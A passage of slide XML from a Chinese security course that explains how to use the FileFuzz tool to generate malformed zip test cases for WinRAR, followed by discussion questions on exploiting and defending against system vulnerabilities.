          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="913774" y="2367092"/>
            <a:ext cx="10363826" cy="4351760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1771650" lvl="3" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下拉菜单中选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>zip-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>zipfldr.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1771650" lvl="3" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>创建一个正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，并在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ourse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处选择该文件作为模板文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1771650" lvl="3" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>arget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>irectory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>处选择生成的测试用例（畸形文件）保存的位置。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1771650" lvl="3" indent="-400050">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置测试用例的生成规则。例如，将“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>yte(s) to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>verwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>填写为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>ange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>tart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>填写为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”，“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>inish</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>填写为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>”，这意味着</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在模板文件的基础上，从文件偏移</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节的地方开始将那里的数据修改为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00FF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，然后修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节偏移处、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节偏移处，直到修改到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字节偏移处为止，并将所有经过修改的畸形文件另存为测试用例。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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xmlns="" val="178798676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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参数设置完后，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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4645564" y="6480312"/>
            <a:ext cx="2900245" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-18 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>FileFuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>参数</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3073" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns="" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="27287"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4145360" y="3507828"/>
            <a:ext cx="3904946" cy="3008342"/>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09511301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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）单击“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>reate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按钮，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将按照规则生成畸形文件并保存在输出路径下，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8-19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </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4120094" y="6480311"/>
            <a:ext cx="3951184" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>8-19 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>生成畸形文件（测试用例）</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5121"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120094" y="3519304"/>
            <a:ext cx="3951184" cy="296100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9848100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b="1" dirty="0"/>
              <a:t>思考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、案例一中存在的情况是否属于系统漏洞？黑客可能会如何利用案例中提到的问题进行网络攻击和渗透？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、案例二中黑客重金买广告位挂马的行为说明了什么？用户应如何做好系统漏洞的防范工作？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、提出用户电脑安全漏洞防御初步解决方案。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="35009614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8.3.1 Fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>测试</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" smtClean="0"/>
              <a:t>uzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>ile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0" err="1"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件工具为例，介绍对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RAR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" cap="none" dirty="0"/>
              <a:t>uzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的方法与</a:t>
            </a:r>
            <a:r>
